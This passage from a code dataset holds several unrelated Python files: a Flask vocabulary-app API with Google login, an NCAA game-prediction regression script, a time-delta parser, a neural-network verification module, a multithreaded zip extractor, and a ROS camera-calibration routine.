and value > 8:\n raise ValueError(\"Must be number in the range [0;8]\")\n return value\n\n @staticmethod\n def validate_word_name(value):\n if type(value) is not str:\n raise ValueError(\"Just checking\")\n if len(value) < 2:\n raise ValueError(\"Word's length can't be less then 2 symbols\")\n return value\n\nclass Words(Resource):\n @marshal_with(words_fields)\n def get(self):\n user, email = getUserWithEmail()\n\n if user:\n words = user.words.all()\n return words\n else:\n return abort(404, message=f\"No user with email - {email}\")\n\n parser = reqparse.RequestParser()\n parser.add_argument(\"limit\", type=int, help=\"{error_msg}\")\n parser.add_argument(\"page\", type=int, help=\"{error_msg}\")\n\n limit = parser.parse_args()[\"limit\"]\n page = parser.parse_args()[\"page\"]\n page = page if page else 0\n\n filtered_arr = []\n if limit:\n i = page * limit if page else 0\n while i < limit * (page + 1) and i < len(words_json):\n filtered_arr.append(words_json[i])\n i += 1\n return filtered_arr\n\n return words_json\n \n def put(self):\n parser = reqparse.RequestParser(bundle_errors=True)\n parser.add_argument(\"id\", type=int)\n parser.add_argument(\"word\", type=WordValidation.validate_word_name)\n parser.add_argument(\"type\", type=WordValidation.validate_type)\n parser.add_argument(\"defs\", type=str)\n parser.add_argument(\"examples\", type=str)\n\n word_id = parser.parse_args()[\"id\"]\n word_name = parser.parse_args()[\"word\"]\n word_type = parser.parse_args()[\"type\"]\n defs = parser.parse_args()[\"defs\"]\n examples = parser.parse_args()[\"examples\"]\n \n user = getUser()\n if user:\n word = user.words.filter_by(id=word_id).first()\n if word:\n word.word_name = word_name\n word.word_type = word_type\n word.definitions = defs\n word.examples = examples\n db.session.commit()\n \n return marshal(word, words_fields), 200\n\n return abort(404, message=f\"No word with id - {word_id}\")\n\n def post(self):\n parser = reqparse.RequestParser(bundle_errors=True)\n parser.add_argument(\"word\", type=WordValidation.validate_word_name)\n parser.add_argument(\"type\", type=WordValidation.validate_type)\n parser.add_argument(\"defs\", type=str)\n parser.add_argument(\"examples\", type=str)\n\n word_name = parser.parse_args()[\"word\"]\n word_type = parser.parse_args()[\"type\"]\n defs = parser.parse_args()[\"defs\"]\n examples = parser.parse_args()[\"examples\"]\n\n user = getUser()\n if user:\n word = Word(word_name=word_name, word_type=word_type, definitions=defs, examples=examples, user=user)\n db.session.add(word)\n db.session.commit()\n\n return marshal(word, words_fields), 201\n\n return abort(400, \"Server error\")\n \n def delete(self):\n user = getUser()\n if user:\n parser = reqparse.RequestParser()\n parser.add_argument(\"wordId\", type=str)\n\n wordId = parser.parse_args()[\"wordId\"]\n\n if wordId:\n word = user.words.filter_by(id=wordId)\n word.delete()\n\n db.session.commit()\n return '', 204\n\n return abort(404, message=f\"Word with id - {wordId} doesn't exist\")\n\n# DELETE\nclass Test(Resource):\n # @marshal_with(user_fields)\n def get(self):\n user = getUser()\n if user:\n print(\"TES\")\n\n return \"This is a test\"\n\nclass Login(Resource):\n # def get(self):\n # google_provider_cfg = get_google_provider_cfg()\n # authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\n\n # url = authorization_endpoint + \"?response_type=code&client_id=632277419807-7k3fohav6n5dtrbhdrrga12vipr22qi5.apps.googleusercontent.com&redirect_uri=https%3A%2F%2F127.0.0.1%3A5000%2Flogin%2Fcallback&scope=openid+email+profile&&access_type=offline\"\n\n # return redirect(url)\n def get(self):\n res = getUser()\n if res is None:\n return abort(404, message=\"\")\n elif res:\n return marshal(res, profile_fields), 200\n elif res.status_code == 401:\n return abort(401, message=\"\")\n else:\n return abort(400, message=\"\")\n\n def post(self):\n googleUser = getGoogleUser()\n\n if googleUser:\n email = googleUser.json()[\"email\"]\n existing_user = User.query.filter_by(email=email).first()\n\n if existing_user is None:\n given_name = googleUser.json()[\"given_name\"]\n family_name = googleUser.json()[\"family_name\"]\n picture = googleUser.json()[\"picture\"]\n \n user = User(email=email, family_name=family_name, given_name=given_name, picture=picture)\n db.session.add(user)\n db.session.commit()\n\n return marshal(user, profile_fields), 200\n # return f\"User {email} was created\"\n\n return f\"User {email} already exists\"\n\n\nclass LoginCallback(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument(\"code\", type=str, help=\"{error_msg}\")\n print(parser.parse_args())\n\n # requests.get()\n return parser.parse_args()[\"code\"]\n\ntypes = [\n \"\",\n \"noun\",\n \"verb\"\n]\n\nclass Types(Resource):\n def get(self):\n return types\n\nfillwords_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String,\n \"topic\": fields.String,\n \"access\": fields.Integer,\n \"data\": fields.String\n}\n\nuser_info_fields = {\n \"id\": fields.Integer,\n \"family_name\": fields.String,\n \"given_name\": fields.String\n}\n\nprofile_fields = {\n \"given_name\": fields.String,\n \"family_name\": fields.String,\n \"picture\": fields.String,\n \"email\": fields.String \n}\n\nfillwords_with_author_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String,\n \"topic\": fields.String,\n \"access\": fields.Integer,\n \"data\": fields.String,\n \"author\": fields.Nested(user_info_fields)\n}\n\nfillwords_json = [\n {\n \"id\": 1,\n \"name\": \"fillword1\",\n \"topic\": \"unsorted\",\n \"access\": 1,\n \"data\": \"no data\"\n },\n {\n \"id\": 2,\n \"name\": \"fillword2\",\n \"topic\": \"unsorted\",\n \"access\": 1,\n \"data\": \"no data\"\n }\n]\n\nclass Fillwords(Resource):\n @marshal_with(fillwords_with_author_fields)\n def get(self):\n fillwords = Fillword.query.all()\n for fillword in fillwords:\n fillword.author = fillword.users.first()\n\n return fillwords\n\n @marshal_with(fillwords_fields)\n def post(self):\n user = getUser()\n if user:\n parser = reqparse.RequestParser()\n\n parser.add_argument(\"name\")\n parser.add_argument(\"topic\")\n parser.add_argument(\"data\")\n\n name = parser.parse_args()[\"name\"]\n topic = parser.parse_args()[\"topic\"]\n data = parser.parse_args()[\"data\"]\n\n fillword = Fillword(name=name, topic=topic, data=data)\n fillword.users.append(user)\n\n db.session.add(fillword)\n db.session.commit()\n\n fillword.author = user\n\n return marshal(fillword, fillwords_with_author_fields), 201\n\n return abort(404)\n\n# ENDPOINTS\napi.add_resource(Test, \"/test\")\napi.add_resource(Types, \"/types\")\n\napi.add_resource(Lists, \"/lists\")\napi.add_resource(ListWords, \"/lists//words\")\n\napi.add_resource(Words, \"/words\")\napi.add_resource(Fillwords, \"/fillwords\")\n\napi.add_resource(Login, \"/login\")\napi.add_resource(LoginCallback, \"/login/callback\")","sub_path":"easylearnApp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":14165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"243755604","text":"import numpy as np\nimport pandas as pd\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\nimport math\nfrom utils import XyScaler\nfrom linear import rmse\nfrom tabulate import tabulate\nfrom linear import linear_modeling_test\nimport statsmodels.api as sm\nimport seaborn as sns\n\ndef roc_curve(predictions, labels, thresholds):\n Recall = []\n FPR = []\n Precision = []\n Accuracy = []\n Spec = []\n\n for score in thresholds:\n pred_int = (predictions > score).astype(int)\n labels_bin = (labels > 0).astype(int)\n tp = ((pred_int == 1) & (labels_bin == 1)).sum()\n fn = ((pred_int == 0) & (labels_bin == 1)).sum()\n fp = ((pred_int == 1) & (labels_bin == 0)).sum()\n tn = ((pred_int == 0) & (labels_bin == 0)).sum()\n tpr = tp/(fn + tp)\n fpr = fp/(tn + fp)\n pre = tp/(fp + tp)\n specificity = tn/(tn+fp)\n acc = (tp + tn)/(tp + tn + fp + fn)\n FPR.append(fpr)\n Recall.append(tpr)\n Precision.append(pre)\n Accuracy.append(acc)\n Spec.append(specificity)\n return np.array(Precision), np.array(Recall), np.array(Accuracy), np.array(Spec), np.array(FPR)\n\ndef roc_graph(y_hat,y, thresholds, name):\n prec, rec, acc, spec, fpr = roc_curve(y_hat, y, thresholds)\n fig, ax = plt.subplots()\n ax.plot(fpr, rec)\n ax.plot(ax.get_xlim(), ax.get_ylim(), ls=\"--\", c=\".3\")\n ax.set_xlabel(\"False Positive Rate (1 - Specificity)\")\n ax.set_ylabel(\"True Positive Rate (Sensitivity, Recall)\")\n ax.set_title(\"ROC plot of {}\".format(name))\n plt.savefig(\"images/ROC of {}\".format(name))\n plt.close()\n\ndef model_regress(X,y,base_estimator,X_final, y_final):\n #standardizer = XyScaler()\n #standardizer.fit(X, y)\n #X_std, y_std = standardizer.transform(X, y)\n # Fit estimator\n estimator = base_estimator\n estimator.fit(X, y)\n coeff = estimator.coef_\n #X_std_final, y_std_final = standardizer.transform(X_final, y_final)\n y_hat_final = estimator.predict(X_final)\n #X_final, y_hat_final = standardizer.inverse_transform(X_std_final,y_hat_std_final)\n rmse_final = rmse(y_final,y_hat_final)\n # Return coefficients\n return coeff, y_hat_final, rmse_final\n\nif __name__ == \"__main__\":\n #using ridge regression with dataframe 3 from model set C to get model and coefficients\n df3 = pd.read_pickle('data/reg_model_data_final3.pkl')\n endogc = df3['label_h_point_spread'].values\n exogsc2 = df3.drop(['label_h_point_spread','label_home_winner','year','home_fgp_var','home_ppg_var',\n 'away_fgp_var','away_ppg_var','home_ps_home','away_ps_away',\n 'home_fgpct','away_fgpct','home_3ppct','away_3ppct',\n 'awayteam_awaywp','hometeam_pt_sprd','hometeam_opp_ppg',\n 'awayteam_pt_sprd','awayteam_opp_ppg','home_pyth_wd','away_pyth_wd',\n 'hometeam_ps_var', 'awayteam_ps_var','home_ftpct','away_ftpct',\n 'hpsq','apsq','hometeam_homewp','home_3pa_perposs','away_3pa_perposs'],axis=1)\n #Applying that model to hold-out test data from NCAA Tournaments\n df_final_test = pd.read_pickle('data/tourney_model_data_final3.pkl')\n endog_final = df_final_test['label_h_point_spread'].values\n exogs_final = df_final_test.drop(['label_h_point_spread','label_home_winner','year','home_fgp_var','home_ppg_var',\n 'away_fgp_var','away_ppg_var','home_ps_home','away_ps_away',\n 'home_fgpct','away_fgpct','home_3ppct','away_3ppct',\n 'awayteam_awaywp','hometeam_pt_sprd','hometeam_opp_ppg',\n 'awayteam_pt_sprd','awayteam_opp_ppg','home_pyth_wd','away_pyth_wd',\n 'hometeam_ps_var', 'awayteam_ps_var','home_ftpct','away_ftpct',\n 'hpsq','apsq','hometeam_homewp','home_3pa_perposs','away_3pa_perposs','DATE','Home','Away'],axis=1)\n\n coeff, y_hat_final, rmse_final = model_regress(exogsc2, endogc,LinearRegression(), exogs_final, endog_final)\n\n coeff_dict = {\"Variables\": exogsc2.columns.values, \"Coefficients\": coeff}\n coeff_df = pd.DataFrame(data = coeff_dict)\n print(tabulate(coeff_df.round(4), headers='keys', tablefmt='pipe'))\n\n #Tabling and Graphing ROC\n thresh = np.arange(-5,5)\n y_prec, y_rec, y_acc, y_spec, y_fpr = roc_curve(y_hat_final, endog_final, thresh)\n roc_dict = {\"Precision\":y_prec, \"Recall\": y_rec, \"Accuracy\": y_acc, \"Specificity\": y_spec, \"False Positive Rate\": y_fpr}\n roc_df = pd.DataFrame(data = roc_dict, index = thresh)\n print(tabulate(roc_df.round(3), headers='keys', tablefmt='pipe'))\n\n thresh2 = np.sort(y_hat_final)\n y_prec2, y_rec2, y_acc2, y_spec2, y_fpr2 = roc_curve(y_hat_final, endog_final, thresh2)\n roc_graph(y_hat_final, endog_final, thresh2, 'Final NCAA Game Prediction Using Pointspread')\n\n df_final_test['Predicted_Point_Spread'] = y_hat_final\n df_final_test.rename(index = str, columns={'label_h_point_spread':'Point_Spread_Actual','label_home_winner':'Home_team_winner'}, inplace=True)\n fig, (ax1, ax2) = plt.subplots(ncols=2, sharey=True)\n sns.lmplot('Predicted_Point_Spread','Point_Spread_Actual', fit_reg=False, data = df_final_test, hue = 'Home_team_winner')\n plt.savefig('images/real_v_predicted1.png')\n plt.close()\n sns.lmplot('Predicted_Point_Spread','Point_Spread_Actual', data = df_final_test)\n plt.savefig('images/real_v_predicted2.png')\n plt.close()\n","sub_path":"src/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"41742908","text":"from datetime import datetime, timedelta\n\n\nSECONDS_PER_UNIT = {\n \"s\": 1,\n \"m\": 60,\n \"h\": 3600,\n \"d\": 86400,\n \"w\": 604800,\n}\n\n\ndef to_time(s, now=None):\n \"\"\"\n Receives a delta of time string, and calculates a past time with that\n delta. The string is formatted as , where UNIT is one of s\n (seconds), m (minutes), h (hours), d (days), w (weeks).\n\n For example:\n\n Using 1 day as delta.\n >>> to_time('1d', now=datetime(2017, 02, 16, 2))\n datetime.datetime(2017, 2, 15, 2, 0)\n\n Using 1 week as delta.\n >>> to_time('1w', now=datetime(2017, 02, 16, 2))\n datetime.datetime(2017, 2, 9, 2, 0)\n\n It should fail when the format is not recognized.\n >>> to_time('1t')\n Traceback (most recent call last):\n ...\n SyntaxError: not a valid time unit: t, must be one of s, m, h, d, w\n\n :param s: the delta of time as an string\n :param now: optional now argument for easy testing\n :return: a resulting datetime object\n \"\"\"\n try:\n number = int(s[:-1])\n except ValueError:\n raise SyntaxError('not an integer number: %s' % s[:-1])\n\n unit = s[-1]\n if unit not in SECONDS_PER_UNIT:\n raise SyntaxError('not a valid time unit: %s, '\n 'must be one of s, m, h, d, w' % unit)\n\n if now is None:\n now = datetime.utcnow()\n else:\n if not isinstance(now, datetime):\n raise ValueError('`now` argument must be a datetime')\n\n return now - timedelta(seconds=number * SECONDS_PER_UNIT[unit])","sub_path":"DetectorSandBox/timeago.py","file_name":"timeago.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"125591406","text":"import numpy as np\nimport collections\nimport copy\n\n\nclass VectorVar:\n # W is weights matrix, b is bias vector, dim is dimensions of vector\n def __init__(self, name, dim, W=None, b=None, cf=1):\n self.name = name\n self.dim = dim\n if W is None:\n self.W = np.identity(dim)\n else:\n self.W = W\n if b is None:\n self.b = np.zeros((dim))\n else:\n self.b = b\n self.cf = cf\n\n\nclass Term:\n # vars is a list of VectorVars, cfs is the list of corresponding coefficients, and isAbs is whether term is in absolute value\n # caseConds is set of case conditions, which are triples, first element is W, second element is var, third element is b\n def __init__(self, name, vars, isAbs=False, cf=1, caseConds=[]):\n self.varArray = vars\n self.vars = {var.name: var for var in vars}\n self.cf = cf\n self.isAbs = isAbs\n self.caseConds = caseConds\n self.name = name\n\n def copy(self):\n vars = [VectorVar(var.name, var.dim, np.copy(var.W), np.copy(var.b), var.cf) for var in self.varArray]\n return Term(self.name, vars, self.isAbs, self.cf, copy.deepcopy(self.caseConds))\n\n\nclass Condition:\n def __init__(self, terms):\n # self.terms = terms\n self.termNameMap = {term.name: term for term in terms}\n\n\ndef condsToString(conds):\n for disj, cond in enumerate(conds):\n s = ''\n if disj != 0:\n s += '\\nv '\n\n termConds = ''\n\n for i, term in enumerate(cond.termNameMap.values()):\n if term.cf == 0:\n break\n\n if i != 0:\n s += ' + '\n\n if term.cf != 1:\n s += str(term.cf)\n\n if term.isAbs:\n s += '|'\n else:\n s += '('\n\n for j, var in enumerate(term.vars):\n if j != 0:\n s += ' + '\n if term.vars[var].cf != 1:\n s += str(term.vars[var].cf)\n s += '('\n s += str(term.vars[var].W) + term.vars[var].name + ' + ' + str(term.vars[var].b)\n # s += 'W' + term.vars[var].name + ' + b'\n\n s += ')'\n\n if term.isAbs:\n s += '|'\n else:\n s += ')'\n\n for varCond in term.caseConds:\n termConds += ' ^ ('\n\n for l, c in enumerate(varCond):\n if l != 0 and l % 3 != 1:\n termConds += ' + '\n termConds += str(c)\n # if varCond[l] < 0:\n # \ttermConds += '-'+ varCond[0] + '_' + str((varCond[l]+1)*-1)\n # else:\n # \ttermConds += varCond[0] + '_' + str(varCond[l]-1)\n\n termConds += ' >= 0)'\n\n s += ' >= 0 '\n s += termConds\n print(s)\n\n\n# def matmul(conds, termName, var, W):\n# \tfor cond in conds:\n# \t\tcond.termNameMap[termName].vars[var].W = cond.termNameMap[termName].vars[var].W.dot(W)\n# \t\tcond.termNameMap[termName].vars[var].dim = cond.termNameMap[termName].vars[var].W.shape[0]\n\n\n\n#for each of these transformations, make sure var dim changes (not completed)\n\ndef matmulTerm(conds, termName, W):\n for cond in conds:\n for var in cond.termNameMap[termName].vars:\n cond.termNameMap[termName].vars[var].W = cond.termNameMap[termName].vars[var].W.dot(W)\n cond.termNameMap[termName].vars[var].dim = cond.termNameMap[termName].vars[var].W.shape[0]\n for i in range(len(cond.termNameMap[termName].caseConds)):\n if cond.termNameMap[termName].caseConds[i][1] == var:\n cond.termNameMap[termName].caseConds[i][0] = cond.termNameMap[termName].caseConds[i][0].dot(W)\n # this would be a place where turning caseConds into a map with var as key would be more efficient\n\n\n# def biasAdd(conds, termName, var, b):\n# \tfor cond in conds:\n# \t\tcond.termNameMap[termName].vars[var].b = cond.termNameMap[termName].vars[var].b + cond.termNameMap[termName].vars[var].W.dot(b)\n\ndef biasAddTerm(conds, termName, b):\n for cond in conds:\n for var in cond.termNameMap[termName].vars:\n cond.termNameMap[termName].vars[var].b = cond.termNameMap[termName].vars[var].b + \\\n cond.termNameMap[termName].vars[var].W.dot(b)\n for i in range(len(cond.termNameMap[termName].caseConds)):\n if cond.termNameMap[termName].caseConds[i][1] == var:\n cond.termNameMap[termName].caseConds[i][2] = cond.termNameMap[termName].caseConds[i][2] + \\\n cond.termNameMap[termName].caseConds[i][0].dot(b)\n\n # this would be a place where turning caseConds into a map with var as key would be more efficient\n\n\n\n#all of the relu methods are not optimized to work together, loops through conds many more times than needed\n# comp is component of vectorVar to apply relu to\ndef relu(conds, termName, var, comp):\n for i in range(len(conds)):\n cond = conds.pop()\n\n # I think this can be made more efficient by just reusing the condition instead of making copy\n cond1 = Condition(cond.termNameMap.values())\n term1 = cond1.termNameMap[termName].copy()\n cond1.termNameMap[termName] = term1\n\n cond2 = Condition(cond.termNameMap.values())\n term2 = cond2.termNameMap[termName].copy()\n cond2.termNameMap[termName] = term2\n\n dim = term1.vars[var].dim\n term1.caseConds.append([np.identity(dim)[comp], var, 0])\n term2.caseConds.append([-1*np.identity(dim)[comp], var, 0])\n\n term2.vars[var].W[:,comp] = 0\n\n conds.appendleft(cond2)\n conds.appendleft(cond1)\n\n\ndef reluLayer(conds, termName, var):\n layerSize = conds[-1].termNameMap[termName].vars[var].dim\n for i in range(layerSize):\n relu(conds, termName, var, i)\n\n\ndef reluLayerTerm(conds, termName):\n for var in conds[-1].termNameMap[termName].vars:\n layerSize = conds[-1].termNameMap[termName].vars[var].dim\n for i in range(layerSize):\n relu(conds, termName, var, i)\n\ndef conv2DLayerTerm(stride, W, xdim=None, ydim=None, termName=None, conds=None):\n\n for index in range(len(conds)):\n cond = conds[index]\n for var in cond.termNameMap[termName].vars:\n\n reshapedW = np.zeros((ydim[1]*ydim[2]*ydim[3],xdim[0]*xdim[1]*xdim[2]))\n\n for filter in range(ydim[3]):\n linearConvs = np.zeros((xdim[2],((xdim[1] * (W.shape[0] - 1)) + W.shape[1])))\n for i in range(W.shape[0]):\n for j in range(W.shape[1]):\n for k in range(W.shape[2]):\n linearConvs[k][(i * xdim[1]) + j] += W[i][j][k][filter]\n\n offset = 0\n resets = 0\n for i in range(ydim[1] * ydim[2]):\n if offset + W.shape[1] > xdim[1]:\n resets += stride[0]\n offset = 0\n for j in range(W.shape[2]):\n reshapedW[filter + (i * ydim[3])][(resets * xdim[1]) + offset + (j * xdim[1]): (resets * xdim[1]) + offset + len(linearConvs[j]) + (j * xdim[1])] = linearConvs[j]\n offset += stride[1]\n\n cond.termNameMap[termName].vars[var].W = cond.termNameMap[termName].vars[var].W.dot(reshapedW)\n # cond.termNameMap[termName].vars[var].dim = cond.termNameMap[termName].vars[var].W.shape[0]\n for i in range(len(cond.termNameMap[termName].caseConds)):\n #this can be made more efficient with restructuring of caseConds\n if cond.termNameMap[termName].caseConds[i][1] == var:\n cond.termNameMap[termName].caseConds[i][0] = cond.termNameMap[termName].caseConds[i][0].dot(reshapedW)\n\n#inspired by ELINA's maxpool_approx\ndef maxpoolLayerTerm(poolDim, inputDim, termName, conds):\n outputDim = [inputDim[0]//poolDim[0], inputDim[1]//poolDim[1], inputDim[2]]\n o12 = outputDim[1] * outputDim[2]\n i12 = inputDim[1] * inputDim[2]\n numOut = outputDim[0] * outputDim[1] * outputDim[2]\n W_mp = np.zeros((inputDim[0] * i12, inputDim[0] * i12))\n # reshapedOrder = np.zeros(len(W_mp))\n counter = 0\n for outPos in range(numOut):\n outX = outPos // o12\n outY = (outPos-outX*o12) // outputDim[2]\n outZ = outPos - outX * o12 - outY * outputDim[2]\n inpX = outX * poolDim[0]\n inpY = outY * poolDim[1]\n inpZ = outZ\n inpPos = inpX*i12 + inpY*inputDim[2] + inpZ\n for xShift in range(poolDim[0]):\n for yShift in range(poolDim[1]):\n poolCurrDim = inpPos + xShift*i12 + yShift*inputDim[2]\n W_mp[counter][poolCurrDim] = 1\n # reshapedOrder[counter] = poolCurrDim\n counter += 1\n\n for i in range(len(conds)):\n cond = conds.pop()\n for var in cond.termNameMap[termName].vars:\n maxpoolHelper(maxpoolConds, np.array([]), W_mp, poolDim, 0, np.identity(inputDim[0] * i12), cond, termName, var)\n\n\ndef maxpoolHelper(maxpoolConds, caseConds, W_mp, poolDim, depth, maxMatrix, cond, termName, var):\n if depth == len(W_mp) // (poolDim[0] * poolDim[1]):\n W = maxMatrix.dot(W_mp)\n newCond = Condition(cond.termNameMap.values())\n newTerm = newCond.termNameMap[termName].copy()\n newCond.termNameMap[termName] = newTerm\n\n #I have to fix the dimension changes in each of the backwards transformations\n # dim = term1.vars[var].dim\n\n for i in range(len(caseConds)):\n for j in range(1,len(caseConds[0])):\n newTerm.caseConds.append([np.identity(len(W[0]))[caseConds[i][0]], var, 0, np.identity(len(W[0]))[caseConds[i][j]], var, 0]) #find a better way to get component of identity matrix, same with relu transformation\n\n newTerm.vars[var].W = newTerm.vars[var].W.dot(W)\n maxpoolConds.appendleft(newCond)\n return\n\n for i in range(poolDim[0]*poolDim[1]):\n pool = np.array([1,1,1,1]) * depth * poolDim[0] * poolDim[1] + np.array([0,1,2,3])\n newConds = np.append(pool[i], np.delete(pool, i))\n if len(caseConds) == 0:\n maxpoolHelper(maxpoolConds, np.vstack((newConds,)), W_mp, poolDim, depth + 1, np.delete(maxMatrix, newConds[1:]), cond, termName, var)\n else:\n maxpoolHelper(maxpoolConds, np.vstack((caseConds, newConds)), W_mp, poolDim, depth + 1, np.delete(maxMatrix, newConds[1:]), cond, termName, var)\n\n\n\n\n\n\n\n\n\n","sub_path":"tf_verify/backwardprop.py","file_name":"backwardprop.py","file_ext":"py","file_size_in_byte":10647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"224540700","text":"import argparse\nimport logging\nimport zipfile\nimport os\nfrom multiprocessing import *\nfrom threading import Thread\nimport time\nimport sys\n\ndef unzip(filename, dir, i):\n zf = zipfile.ZipFile(filename)\n dir = os.path.dirname(os.path.abspath(filename))\n # uncompress_size = sum((file.file_size for file in zf.infolist()))\n # extracted_size = 0\n\n for file in zf.infolist():\n try:\n zf.extract(file, dir)\n except Exception as e:\n raise\n print(e) #logging...\n # extracted_size += file.file_size\n # print(\"%s %%\" % int(extracted_size * 100/uncompress_size))\n\n\ndef start_unzip(i, q, terminated, lock):\n while(not q.empty()):\n try:\n file = q.get()\n # os.system('cls')\n logging.debug('Extracting \\'%s\\' from thread %d', file, i)\n p = Process(target=unzip, args=(file, dir, i,))\n p.start()\n p.join(args.ttimeout)\n if(p.is_alive()):\n p.terminate()\n lock.acquire()\n terminated += 1\n lock.release()\n logging.info('\\'%s\\' reached timeout', file)\n sys.stdout.write(\"\\rProcessing: %d/%d | Terminated: %d\" % (total-q.qsize(), total, terminated))\n except Exception as e:\n logging.error('\\'%s\\': %s', file, e)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", help=\"number of threads\", type=int, default=3)\n parser.add_argument(\"-log\", nargs='?', help=\"logfile name\", default=\"log.txt\")\n parser.add_argument(\"-ttimeout\", help=\"ttimeout in sec for a zip file\", type=float, default=60)\n parser.add_argument(\"-gtimeout\", help=\"total ttimeout in sec\", type=float, default=180)\n parser.add_argument(\"dir\", help=\"dir with zip files\")\n\n args = parser.parse_args()\n args.log = args.log if args.log!=None else \"log.txt\"\n\n logging.basicConfig(filename=args.log, format='[%(asctime)s]\\t[%(levelname)s]\\t\\t%(message)s', level=logging.DEBUG)\n logging.info('%d unzipping threads running', args.t)\n logging.info('%s set as logfile', args.log)\n logging.info('%ds - timeout for a single zip file', args.ttimeout)\n logging.info('%ds - total timeout', args.gtimeout)\n logging.info('Start unzipping ...')\n\n files = Queue()\n terminated = 0\n\n for file in os.listdir(args.dir):\n if file.endswith(\".zip\"):\n f = os.path.join(args.dir, file)\n files.put(f)\n total = files.qsize()\n\n logging.info('Total nr of zipfiles: %d', files.qsize())\n\n lock = Lock()\n t = [0 for i in range(0, args.t)]\n ttime = time.time()\n # os.system('cls')\n\n for i in range(0, args.t):\n try:\n logging.debug('Thread %d starting', i)\n t[i] = Thread(target=start_unzip, args=(i, files, terminated,lock,))\n t[i].start()\n except Exception as e:\n logging.error('Thread %d: %s', i, e)\n\n active = True\n while(time.time()-ttime <= args.gtimeout and active):\n active = False\n for th in t:\n if(th.is_alive()):\n active = True\n time.sleep(1)\n else:\n sys.exit()\n\n if(active):\n logging.info('Reached timeout')\n","sub_path":"munzip.py","file_name":"munzip.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"337087333","text":"#!/usr/bin/env python\n#\n# pydetectobject.py\n#\n# Run a Cascade Object Detector in OpenCV.\n#\n# Subscribers: /image Source image, to be remapped\n# Publishers: /detector/image Destination image\n# /detector/??? Coordinates??\n#\n# Services: none\n#\n\n# ROS Imports\nimport rospy\nimport sensor_msgs.msg\nimport cv2\nimport cv_bridge\nimport numpy as np\nfrom sensor_msgs.msg import Image\nfrom boogaloo.msg import Detection, Activation\nfrom geometry_msgs.msg import Vector3\nfrom sensor_msgs.msg import CameraInfo\nfrom camera_calibration.calibrator import ChessboardInfo\nfrom camera_calibration.calibrator import Calibrator\nfrom cv2 import aruco\nfrom joblib import load\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport rospkg\nimport os\nimport errno\n\ndef intrinsic_params_from_file():\n # Grab a camera_info message, change topic as needed.\n msg = rospy.wait_for_message('/cam_feed/camera_info', CameraInfo)\n\n # Check/grab the camera matrix.\n if (msg.K[0] == 0 or msg.K[1] != 0 or msg.K[2] == 0 or\n msg.K[3] != 0 or msg.K[4] == 0 or msg.K[5] == 0 or\n msg.K[6] != 0 or msg.K[7] != 0 or msg.K[8] != 1):\n rospy.logerr(\"Camera Intrinsic Parameters strangely formatted!\")\n rospy.signal_shutdown(\"Camera incorrectly calibrated\")\n return\n K = np.float64(msg.K).reshape(3,3)\n\n # Check/grab the distortion model.\n D = np.float64(msg.D)\n return K, D\n\nCAP_HEIGHT = 0.20\nBAND_HEIGHT = 0.0254 * 3\nRIM_HEIGHT = 0.0254 * 2.25\n\n\nclass CheckerboardCalibrator:\n def __init__(self):\n # Define the Checkerboard. Note the OpenCV detector\n # apparently assumes more columns than rows.\n self.board = ChessboardInfo()\n self.board.n_cols = 4\n self.board.n_rows = 3\n self.board.dim = 0.0254 * (1 + 7 / 8.0)\n self.K, self.D = intrinsic_params_from_file()\n self.bridge = cv_bridge.CvBridge()\n\n # Instantiate a Calibrator, to extract corners etc.\n self.calibrator = Calibrator([self.board])\n self.R_cam_wrt_world = None\n self.x_cam_wrt_world = None\n self.R_world_wrt_cam = None\n self.x_world_wrt_cam = None\n\n\n def calibrate_checkerboard(self, image, display_image):\n # Test for the presense of a checkerboard and pull out the\n # corners as a list of (u,v) data.\n #gray = self.calibrator.mkgray(image)\n # Grayscale the image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n (ok, corners, board) = self.calibrator.get_corners(gray)\n if not ok:\n print(\"No matching checkerboard...\")\n return [], [], display_image\n corners = corners.reshape(-1,2)\n\n # Set the (X,Y,Z) data for each corner. This presumes the\n # checkerboard is on the Z=0 plane.\n ## 02/28 measurements\n ## x = 82.5, y = -28.9\n ## X_CENTER = 0.834\n ## Y_CENTER = -0.331\n\n # 03/04 measurements\n X_CENTER = 0.8285\n Y_CENTER = -0.3165\n \"\"\"\n Robot thinks\n checkerboard 0.838 x, -0.311 y\n aruco large square, width 6 inchs / 15.2 cm\n 18 aruco top right corner 0.791 x, -0.080 y\n 12 aruco top right 0.294 x, 0.194\n 42 topleft corner of far 0.363 x, -0.310\n 42 topright corner of far 0.363 - 0.152 x, -0.310\n \"\"\"\n\n \"\"\"\n Hand measured\n checkerboard, 0.7735 + 0.055 = 0.8285, 0.3165\n 18, 0.727 + 0.055 = 0.7914, -0.085\n 12 0.2395 + 0.055 = 0.2945, 0.192\n 42 0.148 + 0.055 = 0.203,-0.318\n \"\"\"\n\n xyz = np.zeros((len(corners), 3))\n for r in range(board.n_rows):\n for c in range(board.n_cols):\n i = r*board.n_cols + c\n xyz[i][0] = board.dim * (c - (board.n_cols-1)/2.0) + X_CENTER\n xyz[i][1] = board.dim * ((board.n_rows-1)/2.0 - r) + Y_CENTER\n xyz[i][2] = 0\n\n display_image = cv2.drawChessboardCorners(\n image,\n (self.board.n_cols, self.board.n_rows),\n corners,\n patternWasFound=True\n )\n\n # Really these are lists of (u,v) and (x,y,z)\n return xyz, corners, 